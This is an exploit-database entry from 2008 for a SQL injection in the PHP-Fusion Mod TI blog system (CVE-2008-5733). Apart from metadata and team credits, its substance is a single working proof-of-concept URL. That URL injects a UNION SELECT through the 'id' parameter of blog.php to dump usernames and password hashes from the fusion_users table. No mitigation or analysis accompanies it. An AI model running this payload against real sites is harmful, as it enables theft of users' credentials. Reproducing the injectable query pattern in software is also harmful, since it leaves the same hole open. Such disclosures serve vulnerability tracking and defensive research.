PHP-Fusion Mod TI - 'id' SQL Injection
Author: Khashayar Fereidani
type: webapps
platform: php
port:
date_added: 2008-12-27
date_updated:
verified: 1
codes: CVE-2008-5733;OSVDB-51017;OSVDB-50992
tags:
aliases:
screenshot_url:
application_url:
#####################################################################################
#### PHP-Fusion Mod TI - Blog System Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=157
# #
#####################################################################################
# [Bug] #
# #
#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
# milw0rm.com [2008-12-28]